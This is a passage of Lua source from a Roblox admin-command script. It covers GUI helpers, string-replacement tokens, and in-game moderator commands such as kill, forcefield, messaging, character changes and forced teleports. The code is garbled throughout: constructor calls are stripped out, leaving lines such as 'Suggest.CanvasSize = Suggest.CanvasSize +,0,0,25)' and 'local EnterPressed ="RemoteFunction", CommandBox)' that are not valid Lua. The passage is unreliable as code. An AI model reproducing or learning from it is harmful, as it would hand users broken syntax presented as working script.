  5245. Suggest.CanvasSize = Suggest.CanvasSize +,0,0,25)
  5246. CORE:HandleEvent(Suggestion, "MouseButton1Down", function()
  5247. if Text == Settings.Prefix then
  5248. CommandBox.Text = Settings.Prefix
  5249. else
  5250. CommandBox.Text = Settings.Prefix..Text
  5251. end
  5252. CORE:ExecuteResource("Focus", CommandBox)
  5253. end, true)
  5254. end
  5256. CORE:HandleEvent(CommandBox, "MouseEnter", function()
  5257. if CommandBox.Text == "Enter a command here" then
  5258. CommandBox.Text = ""
  5259. end
  5260. end)
  5262. local EnterPressed ="RemoteFunction", CommandBox) EnterPressed.Name = "EnterPressed"
  5263. CORE:ExecuteResource("ChatBoxLocal", CommandBox)
  5265. CORE:HandleEvent(Execute, "MouseButton1Down", ExecuteText)
  5266. EnterPressed.OnServerInvoke = ExecuteText
  5268. CORE:HandleEvent(CommandBox, "Changed", function(Prop) if Prop == "Text" then
  5269. Suggest.CanvasSize =,0,0,0)
  5270. Suggest:ClearAllChildren()
  5271. local Text = CORE:ReadProperty(RPR, Player, "Text")
  5272. if Text == "" then
  5273. AddSuggestion(Settings.Prefix)
  5274. end
  5276. if string.sub(string.lower(Text),1,#Settings.Prefix) == string.lower(Settings.Prefix) then
  5277. Text = string.sub(Text,#Settings.Prefix+1)
  5278. end
  5279. for _,Data in pairs(UsableCommands) do
  5280. local Command,Args = Data[1],Data[2]
  5281. if string.find(string.lower(Command),string.lower(Text)) then
  5282. local NewSuggestion = Command
  5283. if Args >= 1 then NewSuggestion = NewSuggestion..Settings.Bet end
  5284. AddSuggestion(NewSuggestion)
  5285. end
  5286. end
  5288. end end)
  5289. end
  5291. function GUI:Countdown(Player, AllSeconds) coroutine.wrap(function()
  5292. if not Player or not AllSeconds then return nil end
  5293. AllSeconds = tonumber(AllSeconds)
  5294. local Frame, Close, Closed, _, __, Restore = GUI:CreateForm(Player, "Countdown",, 200, 0, 80),, 0, 0, 200), 154818730)
  5295. AllSeconds = math.floor(AllSeconds)
  5296. if AllSeconds < 1 then AllSeconds = 1 elseif AllSeconds > 300 then AllSeconds = 300 end
  5297. local Time ="TextLabel", Frame) Time.Name = "Time" Time.Size =, 0, 1, 0) Time.BackgroundTransparency = 1 Time.Text = "00:00" Time.Font = "ArialBold" Time.FontSize = "Size24" Time.TextYAlignment = "Top" Time.TextColor3 = GUI:ContrastColor()
  5298. local Full ="Frame", Frame) Full.Name = "Full" Full.Position =, 0, 0.7, 0) Full.Size =, 0, 0, 5) Full.BackgroundColor3 = GUI:ContrastColor() Full.BorderSizePixel = 0
  5299. local Part ="Frame", Full) Part.Name = "Part" Part.Size =, 0, 1, 0) Part.BackgroundColor3 = GUI:GetColor() Part.BorderColor3 =, 1, 1) Part.BorderSizePixel = 2
  5300. local Tick = SOUND:MakeSound(Frame, 151715959, 1, 1)
  5301. local Alarm = SOUND:MakeSound(Frame, 131573697, 1, 1)
  5303. local CurrentSeconds = AllSeconds
  5304. local Alive = true
  5305. coroutine.wrap(function() for i = 0,AllSeconds do
  5306. if not Alive then break end
  5307. local Seconds = tostring(math.fmod(CurrentSeconds,60))
  5308. local Minutes = tostring(math.floor(CurrentSeconds/60))
  5309. if #Seconds == 1 then Seconds = "0"..Seconds end
  5310. if #Minutes == 1 then Minutes = "0"..Minutes end
  5311. Time.Text = Minutes..":"..Seconds
  5312. wait(1)
  5313. if CurrentSeconds <= 0 then
  5314. Alarm:Play()
  5315. Time.Text = "00:00"
  5316. Part.Size =,0,1,0)
  5317. Restore:Invoke()
  5318. wait(4)
  5319. Close:Invoke()
  5320. break
  5321. else
  5322. Tick:Play()
  5323. Part.Size = - CurrentSeconds)/AllSeconds,0,1,0)
  5324. CurrentSeconds = CurrentSeconds - 1
  5325. end
  5326. end end)()
  5328. Closed.Event:connect(function()
  5329. if Alive == true then
  5330. Alive = false
  5331. Tick:Stop()
  5332. Alarm:Stop()
  5333. end
  5334. end)
  5335. end)() end
  5337. function GUI:DetachChat(Player)
  5338. if not Player or not Player:FindFirstChild("PlayerGui") then return nil end
  5339. if Player:FindFirstChild("DetachChatMML") then
  5340. Player.DetachChatMML:Invoke(true)
  5341. wait()
  5342. Player.DetachChatMML:Destroy()
  5343. end
  5345. local Frame, _, Closed = GUI:CreateForm(Player, "Detached Chat",, 0, 0.5, 32), nil, 57550259)
  5346. local SG = Frame.Parent.Parent.Parent
  5348. local DCBF ="BindableFunction", Player)
  5349. DCBF.Name = "DetachChatMML"
  5350. DCBF.OnInvoke = function(Remove)
  5351. if Remove then
  5352. SG:Destroy()
  5353. end
  5354. end
  5355. CORE:ExecuteResource("CoreChat", SG)
  5357. local IsClosed = false
  5358. Closed.Event:connect(function()
  5359. CORE:ExecuteResource("ResetChat", Player:WaitForChild("Backpack"))
  5360. IsClosed = true
  5361. end)
  5363. coroutine.wrap(function()
  5364. Player.CharacterRemoving:wait()
  5365. if not IsClosed then
  5366. IsClosed = true
  5367. wait(1)
  5368. CORE:ExecuteResource("ResetChat", Player:WaitForChild("Backpack"))
  5369. end
  5370. end)()
  5371. end
  5373. function GUI:SendChat(Player, Data, Speaker) coroutine.wrap(function()
  5374. if not Player then return nil end
  5375. if type(Data) ~= "table" then Data = {Text = tostring(Data)} end
  5376. Data.Text = STRING:DetermineFilter(Data.Text, Speaker or Player, Player)
  5378. Player:WaitForChild("SendChat"):InvokeClient(Player, Data)
  5379. end)() end
  5381. function GUI:SoundInfo(Player, SoundID, TitleText, CreatorText, Time, InputSound)
  5382. if not Player or not Player:FindFirstChild("PlayerGui") then return nil end
  5383. if not SoundID then SoundID = SoundInfo["ID"] end
  5384. if not TitleText then TitleText = SoundInfo["Name"] end
  5385. if not CreatorText then CreatorText = SoundInfo["Creator"] end
  5386. if not InputSound then InputSound = Sound end
  5388. local NumSounds = 0
  5389. for _,SG in pairs(Player.PlayerGui:GetChildren()) do
  5390. if SG.Name == "M".."a".."k".."erModelLu".."a's Admin Form Sound" then
  5391. NumSounds = NumSounds + 1
  5392. end
  5393. end
  5395. local Size =, 100, 0.1, 100)
  5396. local Frame, Close, Closed, _, Minimized = GUI:CreateForm(Player, "Playing Sound "..SoundID, Size, * NumSounds, (Size.X.Offset * NumSounds) + (NumSounds * 5), 0.5, -50), "Sound", true, nil, nil, false)
  5397. Frame.Parent.Parent.Parent.Name = Frame.Parent.Parent.Parent.Name.." Sound"
  5399. local SoundLoudness ="Frame", Frame) SoundLoudness.Name = "SoundLoudness" SoundLoudness.Size =, 0, 1, 0) SoundLoudness.BackgroundTransparency = 1 SoundLoudness.Visible = false
  5400. local BurstFrame ="Frame", SoundLoudness) BurstFrame.Name = "BurstFrame" BurstFrame.Size =, 0, 1, 0) BurstFrame.BackgroundTransparency = 1
  5401. local Spin ="Frame", SoundLoudness) Spin.Name = "Spin" Spin.Size =, 0, 1, 0) Spin.BackgroundTransparency = 1
  5402. local MainPoint ="ImageLabel", SoundLoudness) MainPoint.Name = "MainPoint" MainPoint.Position =, 0, 0.25, 0) MainPoint.Size =, 0, 0.5, 0) MainPoint.BackgroundTransparency = 1 MainPoint.Image = "rbxassetid://301292168" MainPoint.SizeConstraint = "RelativeYY"
  5403. local Bar ="Frame", SoundLoudness) Bar.Name = "Bar" Bar.Position =, 0, 0, 0) Bar.Size =, 10, 0.3, 0) Bar.BackgroundTransparency = 1 Bar.SizeConstraint = "RelativeYY"
  5404. local Fill ="Frame", Bar) Fill.Name = "Fill" Fill.Position =, 0, 1, 0) Fill.Size =, 0, -0.5, 0) Fill.BackgroundColor3 =, 1, 1) Fill.BorderSizePixel = 0
  5405. local Burst ="ImageLabel", SoundLoudness) Burst.Name = "Burst" Burst.BackgroundTransparency = 1 Burst.Image = "rbxassetid://142700369" Burst.ImageTransparency = 0.5-- Bar.SizeConstraint = "RelativeYY"
  5407. local Title ="TextLabel", Frame) Title.FontSize = "Size24" Title.TextWrapped = true Title.Size =, 0, 0.8, -35) Title.TextColor3 =,1,1) Title.TextStrokeColor3 =,0,0) Title.TextStrokeTransparency = 0 Title.Text = TitleText Title.BackgroundTransparency = 1 Title.Font = Settings.Font Title.Name = "Title"
  5408. local Creator ="TextLabel", Frame) Creator.FontSize = "Size18" Creator.TextWrapped = true Creator.Size =, 0, 0.2, 0) Creator.TextColor3 =,1,1) Creator.TextStrokeColor3 =,0,0) Creator.TextStrokeTransparency = 0 Creator.Text = CreatorText Creator.Position =, 0, 0.8, -35) Creator.BackgroundTransparency = 1 Creator.Font = Settings.Font Creator.Name = "Creator"
  5409. if Sound then
  5410. CORE:ExecuteResource("GraphicalSound", SoundLoudness, {["Sound"] = Sound})
  5411. end
  5412. if Time then
  5413. local Timer ="TextLabel", Frame) Timer.FontSize = "Size14" Timer.TextWrapped = true Timer.Size =, 0, 0, 35) Timer.TextColor3 = GUI:ContrastColor() Timer.Position =, 0, 1, -35) Timer.BackgroundTransparency = 1 Timer.Font = Settings.Font Timer.Name = "Timer"
  5414. local Stop ="ImageButton", Timer) Stop.Image = "rbxassetid://49494354" Stop.Size =, 30, 0, 30) Stop.BackgroundTransparency = 1 Stop.Position =, -35, 0, 2)
  5416. coroutine.wrap(function()
  5417. local Alive = true
  5419. local function StopTimer() Alive = false end
  5420. Closed.Event:connect(StopTimer)
  5421. Minimized.Event:connect(StopTimer)
  5422. CORE:HandleEvent(Stop, "MouseButton1Down", StopTimer)
  5424. for i = Time,0,-1 do
  5425. for ii = 1,10 do
  5426. if Alive == true then
  5427. Timer.Text = i
  5428. wait(0.1)
  5429. else
  5430. break
  5431. end
  5432. end
  5433. end
  5434. if Alive == true then
  5435. Close:Invoke()
  5436. else
  5437. Timer:Destroy()
  5438. Stop:Destroy()
  5439. end
  5440. end)()
  5441. end
  5442. end
  5446. -- {"_REPLACEMENT", "Replaces input string with ".."string description", RequiresPlayer, function(Player)}
  5448. -- Like the commands, this table must be placed here in order for the variables in the functions to successfully initalize.
  5450. StringReplacements = {
  5451. {"_SERVERTIME", "total server time in seconds", false, function(Player) return tostring(math.floor(Workspace.DistributedGameTime)) end};
  5452. {"_PLACEID", "the current place's ID", false, function(Player) return tostring(game.PlaceId) end};
  5453. {"_CREATORID", "the game's creator's user ID", false, function(Player) return tostring(game.CreatorId) end};
  5454. {"_CREATOR", "the game's creator's username", false, function(Player) return GameOwner end};
  5455. {"_PLACENAME", "the current place's name", false, function(Player) return PlaceName end};
  5456. {"_REVPLACENAME", "the current place's name in reverse", false, function(Player) return string.reverse(PlaceName) end};
  5457. {"_PLACEDESC", "the current place's description", false, function(Player) return PlaceInfo.Description end};
  5458. {"_RANDOM", "a random number from 1-10000", false, function(Player) return tostring(math.random(1,10000)) end};
  5459. {"_DATE", "the current date (if Http connected)", false, function(Player) return Date or "Cannot get date. Http not connected" end};
  5460. {"_TIME", "the current time", false, function(Player) return CORE:GetTime(true) end};
  5462. {{"_SOUNDID", "_SONGID", "_MUSICID"}, "the ID of the sound playing", false, function(Player) return tostring(SoundInfo["ID"]) end};
  5463. {{"_SOUNDCREATOR", "_SONGCREATOR", "_MUSICCREATOR"}, "the name of the creator of the sound playing", false, function(Player) return SoundInfo["Creator"] end};
  5464. {{"_SOUND", "_SONG", "_MUSIC"}, "the name of the sound playing", false, function(Player) return SoundInfo["Name"] end};
  5465. {"_FONT", "the font of the admin", false, function(Player) return Settings.Font end};
  5466. {"_COLOR", "the color scheme of the admin", false, function(Player) return Settings.ColorScheme end};
  5467. {{"_TRANS", "_TRANSPARENCY"}, "the transparency scheme of the admin", false, function(Player) return tostring(Settings.TransparencyScheme * 100).."%%" end};
  5469. {"_USERID", "player's UserID", true, function(Player) return tostring(Player.UserId) end};
  5470. {"_NAMELEN", "player's username length", true, function(Player) return tostring(string.len(Player.Name)) end};
  5471. {"_REVNAME", "player's username in reverse", true, function(Player) return string.reverse(Player.Name) end};
  5472. {"_UPNAME", "player's username in uppercase", true, function(Player) return string.upper(Player.Name) end};
  5473. {"_LOWNAME", "player's username in lowercase", true, function(Player) return string.lower(Player.Name) end};
  5474. {"_NAME", "player's username", true, function(Player) return Player.Name end};
  5475. {"_LEETNAME", "player's username in leetspeak", true, function(Player) return STRING:LeetSpeak(Player.Name) end};
  5476. {"_ACCOUNTAGE", "player's account age", true, function(Player) return STRING:FindAge(Player.AccountAge) end};
  5477. {"_AGE", "player's account age", true, function(Player) return STRING:FindAge(Player.AccountAge) end};
  5478. {{"_BENCHMARK", "_BENCH"}, "player's benchmark score (if available)", true, function(Player) if ClientInfo[Player.Name].Benchmark then return tostring(ClientInfo[Player.Name].Benchmark) else return "[NO BENCHMARK]" end end};
  5479. {"_WALKSPEED", "player's WalkSpeed", true, function(Player) if Player.Character and Player.Character:FindFirstChild("Humanoid") then return tostring(Player.Character.Humanoid.WalkSpeed) else return "No humanoid" end end};
  5480. {"_HEALTH", "player's health", true, function(Player) if Player.Character and Player.Character:FindFirstChild("Humanoid") then return tostring(Player.Character.Humanoid.Health) else return "No humanoid" end end};
  5481. {"_MAXHEALTH", "player's MaxHealth", true, function(Player) if Player.Character and Player.Character:FindFirstChild("Humanoid") then return tostring(Player.Character.Humanoid.MaxHealth) else return "No humanoid" end end};
  5482. {"_RANKNUM", "player's rank number", true, function(Player) local PlayerRank,RankNum = RANK:GetRank(Player) return tostring(RankNum) end};
  5483. {"_RANK", "player's rank", true, function(Player) local PlayerRank,RankNum = RANK:GetRank(Player) return PlayerRank end};
  5484. {{"_POS", "_POSITION"}, "player's position", true, function(Player) if CORE:FindBodyPart(Player, "Torso") then local Pos = CORE:FindBodyPart(Player, "Torso").Position return tostring(CORE:Round(Pos.X)..", "..CORE:Round(Pos.Y)..", "..CORE:Round(Pos.Z)) else return "No torso" end end};
  5485. }
  5487. ---- COMMANDS ----
  5489. -- Format: [{"CommandName", "CommandName2", "..."}] = {"Command Example of Args", "Command Description", Arguments, "Minimum Rank", FunCommand, ExecuteFunction(Speaker, Rank, {Arguments})
  5491. Commands = { -- can't make local
  5492. [{"test", "tst"}] = {"", "Prompts a message saying it works. If there's no message it doesn't work", 0, "Member", false, function(Speaker, Rank, Arguments)
  5493. print("[MML's Admin]: Test message from "..Speaker.Name)
  5494. GUI:SendMessage(Speaker, "Test complete", "MakerModelLua's Admin V"..CORE.Version.Value.." works fine!", "Check")
  5495. end};
  5497. [{"kill", "die"}] = {"player", "Breaks the player's joints and kills them", 1, "Member", false, function(Speaker, Rank, Arguments)
  5498. local Players = STRING:Scan(Arguments[1], Speaker)
  5499. for _,Player in pairs(Players) do
  5500. if Player.Character then
  5501. Player.Character:BreakJoints()
  5502. end
  5503. end
  5504. end};
  5506. [{"ff", "forcefield"}] = {"player", "Gives the player a protective forcefield", 1, "Member", false, function(Speaker, Rank, Arguments)
  5507. local Players = STRING:Scan(Arguments[1], Speaker)
  5508. for _,Player in pairs(Players) do
  5509. if Player.Character then
  5510."ForceField", Player.Character)
  5511. end
  5512. end
  5513. end};
  5515. [{"noff", "unff", "noforcefield", "unforcefield"}] = {"player", "Removes any forcefields on the player", 1, "Member", false, function(Speaker, Rank, Arguments)
  5516. local Players = STRING:Scan(Arguments[1], Speaker)
  5517. for _,Player in pairs(Players) do
  5518. if Player.Character then
  5519. for _,Get in pairs(Player.Character:GetChildren()) do
  5520. if Get:IsA("ForceField") then
  5521. Get:Destroy()
  5522. end
  5523. end
  5524. end
  5525. end
  5526. end};
  5528. [{"m", "msg", "message"}] = {"string", "Sends everyone in a server a message of string", 1, "Member", false, function(Speaker, Rank, Arguments)
  5529. for _,Player in pairs(Server.Players:GetPlayers()) do
  5530. GUI:SendMessage(Player, "Message from "..Speaker.Name, Arguments[1], "Message", 10, true, Speaker)
  5531. end
  5532. end};
  5534. [{"sm", "smsg", "smessage", "systemm", "systemmsg", "systemmessage"}] = {"string", "Sends everyone in a server a message of string as a system message", 1, "Admin", false, function(Speaker, Rank, Arguments)
  5535. for _,Player in pairs(Server.Players:GetPlayers()) do
  5536. GUI:SendMessage(Player, "MAK".."ERMODELLU".."A'S ADMIN SYSTEM MESSAGE", Arguments[1], 132769569, nil, false, Speaker)
  5537. end
  5538. end};
  5540. [{"pm", "personalmessage", "personalmsg", "personalm", "pmessage", "pmsg"}] = {"player string", "Sends the particular player a message of string", 2, "Member", false, function(Speaker, Rank, Arguments)
  5541. local Players = STRING:Scan(Arguments[1], Speaker)
  5542. for _,Player in pairs(Players) do
  5543. GUI:SendMessage(Player, "Message from "..Speaker.Name, Arguments[2], "Message", 20, false, Speaker)
  5544. end
  5545. end};
  5547. [{"cm", "chatmessage", "chatmsg"}] = {"string", "Sends everyone in a server a chatted message of string", 1, "Admin", false, function(Speaker, Rank, Arguments)
  5548. for _,Player in pairs(Server.Players:GetPlayers()) do
  5549. GUI:SendChat(Player, {Text = "[ MML'S ADMIN ]: "..Speaker.Name..": "..Arguments[1], FontSize = Enum.FontSize.Size24}, Speaker)
  5550. end
  5551. end};
  5553. [{"pcm", "pchatmessage", "pchatmsg", "personalcm", "personalchatmessage", "personalchatmsg"}] = {"player string", "Sends player the chatted message of string", 2, "Admin", false, function(Speaker, Rank, Arguments)
  5554. local Players = STRING:Scan(Arguments[1], Speaker)
  5555. for _,Player in pairs(Players) do
  5556. GUI:SendChat(Player, {Text = "[ MML'S ADMIN ]: "..Speaker.Name..": "..Arguments[2], FontSize = Enum.FontSize.Size24}, Speaker)
  5557. end
  5558. end};
  5560. [{"age", "getage"}] = {"player", "Shows the age of player", 1, "Member", false, function(Speaker, Rank, Arguments)
  5561. local Players = STRING:Scan(Arguments[1], Speaker)
  5562. local AgeList = {}
  5563. for _,Player in pairs(Players) do
  5564. table.insert(AgeList, Player.Name..": "..STRING:FindAge(Player.AccountAge))
  5565. end
  5566. GUI:ListGui(Speaker, "Player Ages", AgeList, "Time")
  5567. end};
  5569. [{"showage", "sendage"}] = {"player players", "Shows the age of player to players", 2, "Member", false, function(Speaker, Rank, Arguments)
  5570. local Players = STRING:Scan(Arguments[1], Speaker)
  5571. local AgeList = {}
  5572. for _,Player in pairs(Players) do
  5573. table.insert(AgeList, Player.Name..": "..STRING:FindAge(Player.AccountAge))
  5574. end
  5575. local SecondPlayers = STRING:Scan(Arguments[2], Speaker)
  5576. for _,Player in pairs(SecondPlayers) do
  5577. GUI:ListGui(Player, "Player Ages", AgeList, "Time")
  5578. end
  5579. end};
  5581. [{"commands", "cmds", "commandlist", "cmdlist"}] = {"", "Shows a list of all the commands", 0, "Non-Admin", false, function(Speaker, Rank, Arguments)
  5582. local Storage = {{}, {}, {}, {}}
  5583. local StorageText = {}
  5584. local Formatted = {}
  5585. for CommandNames,Data in pairs(Commands) do
  5586. if not Data.Hidden then
  5587. local RankNeeded = RANK:ConvertRank(Data[4])
  5588. local Add = ""
  5589. if Data[4] == "Non-Admin" then Add = "BLACK " end
  5590. if Data[4] == "Admin" then Add = "CYAN " end
  5591. if Data[4] == "Member" then Add = "BLUE " end
  5592. if Data[4] == "Owner" then Add = "BROWN " end
  5593. if RankNeeded > RANK:ConvertRank(Rank) then Add = "RED " end
  5594. local AddBet = Settings.Bet
  5595. if Data[3] <= 0 then AddBet = "" end -- for commands with no args
  5596. local Text = Settings.Prefix..CommandNames[1]..AddBet..Data[1].." [ "..Data[4].." ]"
  5597. table.insert(Storage[RankNeeded + 1], Add..Text)
  5598. StorageText[Text] = CommandNames
  5599. end
  5600. end
  5601. for Num,_ in pairs(Storage) do
  5602. table.sort(Storage[Num])
  5603. end
  5604. for _,Table in pairs(Storage) do
  5605. for _,Command in pairs(Table) do
  5606. table.insert(Formatted, Command)
  5607. end
  5608. end
  5609. local Clicked,Dialog = GUI:ListGui(Speaker, "Command List", Formatted, 98616974, true)
  5610. Clicked.Event:connect(function(Text)
  5611. GUI:ShowCommand(Speaker, StorageText[Text], Dialog)
  5612. end)
  5613. end};
  5615. [{"getcommand", "getinfo", "getcmd", "commandinfo", "cmdinfo", "commanddetails", "cmddetails"}] = {"string", "Gets information on the command string", 1, "Non-Admin", false, function(Speaker, Rank, Arguments)
  5616. GUI:ShowCommand(Speaker, string.lower(Arguments[1]))
  5617. end};
  5619. [{"color", "cs", "colorscheme", "colortheme", "ct", "cscheme"}] = {"string(color)", "Changes the color scheme to Color", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5620. if GUI:GetColor(Arguments[1]) then
  5621. local ColorScheme = string.upper(Arguments[1])
  5622. if ColorScheme == "RANDOM" then Colors.RANDOM =,255)/255,math.random(0,255)/255,math.random(0,255)/255) end
  5623. Settings.ColorScheme = ColorScheme
  5624. GUI:SendMessage(Speaker, "Color Scheme Changed", "Color scheme has been changed to "..string.lower(Arguments[1]).." successfully", "Check")
  5625. else
  5626. GUI:SendMessage(Speaker, "Color Scheme Change Fail", "Color scheme cannot be changed to "..string.lower(Arguments[1]).." because it is not a valid color", "Error")
  5627. end
  5628. end};
  5630. [{"colors", "colorlist", "listcolors", "colorschemes", "colorthemes", "cschemes"}] = {"", "Shows all the colors in the color list", 0, "Member", false, function(Speaker, Rank, Arguments)
  5631. local List = {}
  5632. for Color,_ in pairs(Colors) do
  5633. table.insert(List, Color.." "..Color)
  5634. end
  5635. GUI:ListGui(Speaker, "Color Schemes", List, 31320560)
  5636. end};
  5638. [{"trans", "transparency", "transscheme", "transparencyscheme", "tscheme"}] = {"number", "Changes the transparency scheme to number", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5639. local Transparency = tonumber(Arguments[1])
  5640. if Transparency then
  5641. if Transparency > 90 then Transparency = 90 end
  5642. if Transparency < 10 then Transparency = 10 end
  5643. Settings.TransparencyScheme = Transparency/100
  5645. GUI:SendMessage(Speaker, "Transparency Scheme Change", "Transparency scheme has been changed to "..Transparency.."% successfully", "Check")
  5646. else
  5647. GUI:SendMessage(Speaker, "Transparency Scheme Change Fail", "Transparency scheme cannot be changed to "..Arguments[1].."% because it is not a number", "Error")
  5648. end
  5649. end};
  5651. [{"font", "fontscheme", "fscheme"}] = {"string", "Changes the font of the admin.", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5652. if Fonts[Arguments[1]] then
  5653. Settings.Font = Arguments[1]
  5654. GUI:SendMessage(Speaker, "Font Change", "Font has been changed to "..Arguments[1].." successfully", "Check")
  5655. end
  5656. end};
  5658. [{"fun", "togglefun"}] = {"", "Toggles if fun commands can be executed or not from members", 0, "Owner", false, function(Speaker, Rank, Arguments)
  5659. Settings.Fun = not Settings.Fun
  5660. GUI:MessageAdmins("Fun Commands", "Fun commands can be executed: "..STRING:StringToBool(Settings.Fun))
  5661. end};
  5663. [{"abuse", "abusive", "abusable", "toggleabuse", "toggleabusable"}] = {"", "Toggles if abusable commands can be executed or not from members", 0, "Owner", false, function(Speaker, Rank, Arguments)
  5664. Settings.DisableAbuse = not Settings.DisableAbuse
  5665. GUI:MessageAdmins("Abusable Commands", "Abusable commands can be executed from members now: "..(not STRING:StringToBool(Settings.DisableAbuse)))
  5666. end};
  5668. [{"fontlist", "fonts", "getfont", "getfonts"}] = {"", "Shows all fonts available", 0, "Member", false, function(Speaker, Rank, Arguments)
  5669. local List = {}
  5670. for Font,_ in pairs(Fonts) do
  5671. if Font == Settings.Font then
  5672. table.insert(List, Font.." "..Font.." (CURRENT FONT)")
  5673. else
  5674. table.insert(List, Font.." "..Font)
  5675. end
  5676. end
  5677. GUI:ListGui(Speaker, "Font list", List, 44453197)
  5678. end};
  5680. [{"exesound", "executesound"}] = {"ID", "Changes the sound ID of when a command is execute(0 for no sound)", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5681. local SoundID = tonumber(Arguments[1])
  5682. if SoundID then
  5683. Settings.ExecuteNotificationSound = SoundID
  5685. GUI:SendMessage(Speaker, "Execute sound success", "Sound execution notification sound has been changed to "..SoundID.." successfully", "Check")
  5686. else
  5687. GUI:SendMessage(Speaker, "Execute sound Fail", "Sound execution notification sound cannot be changed to "..Arguments[1].." because it is not a number", "Error")
  5688. end
  5689. end};
  5691. [{"noexesound", "noexecutesound", "unexesound", "unexecutesound"}] = {"", "Changes the sound ID of when a command is executed to 0(So it doesn't play)", 0, "Owner", false, function(Speaker, Rank, Arguments)
  5692. Settings.ExecuteNotificationSound = 0
  5693. end};
  5695. [{"char", "character"}] = {"player string/num(ID)", "Changes player's character appearance to look like the character with the id ID or string.", 2, "Member", false, function(Speaker, Rank, Arguments)
  5696. local Players = STRING:Scan(Arguments[1], Speaker)
  5697. for _,Player in pairs(Players) do
  5698. CORE:ChangeCharacter(Player, Arguments[2], false, Speaker)
  5699. end
  5700. end};
  5702. [{"rich", "merely"}] = {"player", "Changes player's character appearance to look like Merely", 1, "Member", false, function(Speaker, Rank, Arguments)
  5703. local Players = STRING:Scan(Arguments[1], Speaker)
  5704. for _,Player in pairs(Players) do
  5705. CORE:ChangeCharacter(Player, 13416513, false, Speaker)
  5706. end
  5707. end};
  5709. [{"makerm".."odellua", "luamodelma".."ker", "mml", "lmm"}] = {"player", "Changes player's character appearance to look like MakerMo".."delLua", 1, "Member", false, function(Speaker, Rank, Arguments)
  5710. local Players = STRING:Scan(Arguments[1], Speaker)
  5711. for _,Player in pairs(Players) do
  5712. coroutine.wrap(function()
  5713. CORE:ChangeCharacter(Player, 38837082, false, Speaker)
  5714. wait(1)
  5715. GUI:SendMessage(Player, "Wow!", "You're looking cool!", "Admin", 7)
  5716. end)()
  5717. end
  5718. end, Hidden = true};
  5720. [{"become", "bcome"}] = {"player string/num(ID)", "Changes player's character appearance to look like the character with the id ID or string and also name you.", 2, "Member", false, function(Speaker, Rank, Arguments)
  5721. local Players = STRING:Scan(Arguments[1], Speaker)
  5722. for _,Player in pairs(Players) do
  5723. CORE:ChangeCharacter(Player, Arguments[2], false, Speaker, true)
  5724. end
  5725. end};
  5727. [{"name", "rename"}] = {"player name", "Changes player's character name", 2, "Member", false, function(Speaker, Rank, Arguments)
  5728. local Players = STRING:Scan(Arguments[1], Speaker)
  5729. for _,Player in pairs(Players) do
  5730. CORE:ChangeName(Player, Arguments[2])
  5731. end
  5732. end};
  5734. [{"noname", "unname"}] = {"player", "Removes player's names from the 'name' command", 1, "Member", false, function(Speaker, Rank, Arguments)
  5735. local Players = STRING:Scan(Arguments[1], Speaker)
  5736. for _,Player in pairs(Players) do
  5737. if Player.Character then
  5738. local Head = Player.Character:FindFirstChild("Label")
  5739. if Head then Head:Destroy() end
  5740. local Head = Player.Character:FindFirstChild("Head")
  5741. if Head then Head.Transparency = 0 if Head:FindFirstChild("Face") then Head.face.Transparency = 0 end end
  5742. end
  5743. end
  5744. end};
  5746. [{"ogre", "shrek"}] = {"player", "Changes the player into shrek", 1, "Member", true, function(Speaker, Rank, Arguments)
  5747. local Players = STRING:Scan(Arguments[1], Speaker)
  5748. for _,Player in pairs(Players) do
  5749. CORE:ChangeCharacter(Player, 11397, false, Speaker)
  5750. end
  5751. end};
  5753. [{"forcetp", "forcetp", "forceplace"}] = {"player num(ID)", "Forces a player to teleport to the place with the id of ID", 2, "Owner", false, function(Speaker, Rank, Arguments)
  5754. local Players = STRING:Scan(Arguments[1], Speaker)
  5755. for _,Player in pairs(Players) do
  5756. local _,RankNum = RANK:GetRank(Player)
  5757. if RankNum <= RANK:ConvertRank(Rank) then
  5758. Server.TS:Teleport(Arguments[2], Player)
  5759. end
  5760. end
  5761. end};
  5763. [{"forcefollow"}] = {"player num(UserID)", "Forces a player to teleport to the place num(UserID) is at(Only works in universes at this time)", 2, "Owner", false, function(Speaker, Rank, Arguments)
  5764. local Players = STRING:Scan(Arguments[1], Speaker)
  5765. local Suc, Err, PlaceID, IntID = Server.TS:GetPlayerPlaceInstanceAsync(tonumber(Arguments[2]))
  5766. if Suc then
  5767. for _,Player in pairs(Players) do
  5768. Server.TS:TeleportToPlaceInstance(PlaceID, IntID, Player)
  5769. end
  5770. else
  5771. GUI:SendMessage(Speaker, "Place Teleportation Failed for UserID: "..Arguments[2], "Cannot follow UserID: "..Arguments[2]..". Reason: "..Err, 5)
  5772. end
  5773. end};
  5775. [{"follow"}] = {"player num(UserID)", "Prompts a player to teleport to the place num(UserID) is at(Only works in universes at this time)", 2, "Owner", false, function(Speaker, Rank, Arguments)
  5776. local Players = STRING:Scan(Arguments[1], Speaker)
  5777. MARKET:PromptPurchase(Player, Arguments[2], Speaker, function()
  5778. local Suc, Err, PlaceID, IntID = Server.TS:GetPlayerPlaceInstanceAsync(tonumber(Arguments[2]))
  5779. if Suc then
  5780. for _,Player in pairs(Players) do
  5781. Server.TS:TeleportToPlaceInstance(PlaceID, IntID, Player)
  5782. end
  5783. else
  5784. GUI:SendMessage(Speaker, "Place Teleportation Failed for UserID: "..Arguments[2], "Cannot follow UserID: "..Arguments[2]..". Reason: "..Err, 5)
  5785. end
  5786. end)
  5787. end};
  5789. [{"accelerate", "accel", "acl"}] = {"player", "Accelerates them across roblox", 1, "Admin", true, function(Speaker, Rank, Arguments)
  5790. local Players = STRING:Scan(Arguments[1], Speaker)
  5791. for _,Player in pairs(Players) do
  5792. local _,RankNum = RANK:GetRank(Player)
  5793. if RankNum < RANK:ConvertRank(Rank) then
  5794. Server.TS:Teleport(155307015, Player)
  5795. end
  5796. end
  5797. end};
  5799. [{"rickroll", "rickastly"}] = {"player", "Rick rolls them to the movies", 1, "Admin", true, function(Speaker, Rank, Arguments)
  5800. local Players = STRING:Scan(Arguments[1], Speaker)
  5801. for _,Player in pairs(Players) do
  5802. local _,RankNum = RANK:GetRank(Player)
  5803. if RankNum < RANK:ConvertRank(Rank) then
  5804. Server.TS:Teleport(347911447, Player)
  5805. end
  5806. end
  5807. end};
  5809. [{"shield"}] = {"player", "Creates a protective shield around the player", 1, "Admin", false, function(Speaker, Rank, Arguments)
  5810. local Players = STRING:Scan(Arguments[1], Speaker)
  5811. for _,Player in pairs(Players) do
  5812. CORE:GenerateShield(Player)
  5813. end
